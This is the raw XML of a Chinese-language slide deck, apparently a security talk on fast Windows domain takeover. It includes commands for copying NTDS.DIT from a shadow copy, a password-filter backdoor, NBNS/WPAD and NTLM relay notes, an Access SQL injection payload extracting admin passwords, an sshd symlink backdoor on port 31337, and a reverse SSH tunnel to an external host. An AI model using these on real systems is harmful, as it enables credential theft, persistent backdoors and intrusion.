            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C:\&gt;copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\ntds\NTDS.DIT .</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C:\&gt;cscript vssown.vbs /delete {D79A4E73-CCAB-4151-B726-55F6C5C3A853}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>C:\&gt;cscript vssown.vbs /stop	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Passcape Windows Password Recovery</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://www.passcape.com/windows_password_recovery</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件服务器用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BDF</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>插</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://github.com/secretsquirrel/the-backdoor-factory</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:t>支持多种文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(PE/ELF/Mach-O)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>支持代码签名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="捕获"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445260" y="2435860"/>
            <a:ext cx="4364355" cy="41484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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>evilpassfilter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://gist.github.com/mubix/6514311#file-evilpassfilter-cpp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021715" y="1710055"/>
            <a:ext cx="7598410" cy="4984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黑客工具使用的逆向思维</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a:t>NBNS欺骗除了用于扩展其他服务器，欺骗本地服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WPAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗除了用于扩展其他服务器，欺骗本地服务器？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨协议攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原理：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NBNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HOSTS -&gt; DNS -&gt; NBNS </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WPAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代理服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://wpad/wpad.dat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>MS08-068</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows: Local WebDAV NTLM Reflection Elevation of Privilege	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP -&gt; SMB NTLM Relay</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-C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黑客工具使用的逆向思维</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="捕获"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="871220" y="848360"/>
            <a:ext cx="8468995" cy="56997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t>议题的内容：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="3600" dirty="0" smtClean="0"/>
              <a:t>快速获取域权限的方法</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>黑客工具使用的逆向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>思维</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>钓鱼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>绕过</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钓鱼站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dsum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dfirst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>list.asp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
              <a:t>=123-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dsum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
              <a:t>(39)%2bcstr((select+top+1+password+from+admin)),’admin’)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:buNone/>
            </a:pP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钓鱼站的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>绕过</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0" name="Picture 2" descr="C:\Users\yubo\Desktop\飞信截图2016052721074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3855" y="1127861"/>
            <a:ext cx="8977313" cy="20494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yubo\Desktop\飞信截图20160527211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855" y="3617293"/>
            <a:ext cx="8321675" cy="1096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目前已经掌握的情况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839595" y="1461136"/>
            <a:ext cx="10515600" cy="5100143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>搞定一台边界的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0" smtClean="0"/>
              <a:t>配置文件中有注释掉的一个域帐号</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>当前机器不在域中</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>怎么收集信息？</a:t>
            </a:r>
            <a:endParaRP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准备工作：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>方便本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>下的工具使用，开个反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>socks5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	ln -sf /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>oPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=31337</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-o "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>StrictHostKeyChecking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> no" -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>UserKnownHostsFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=/dev/null -T -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>fND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 127.0.0.1:8888 mail@127.0.0.1 -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>31337</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>StrictHostKeyChecking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fNR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 8888:127.0.0.1:8888 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> proxy@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>公网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
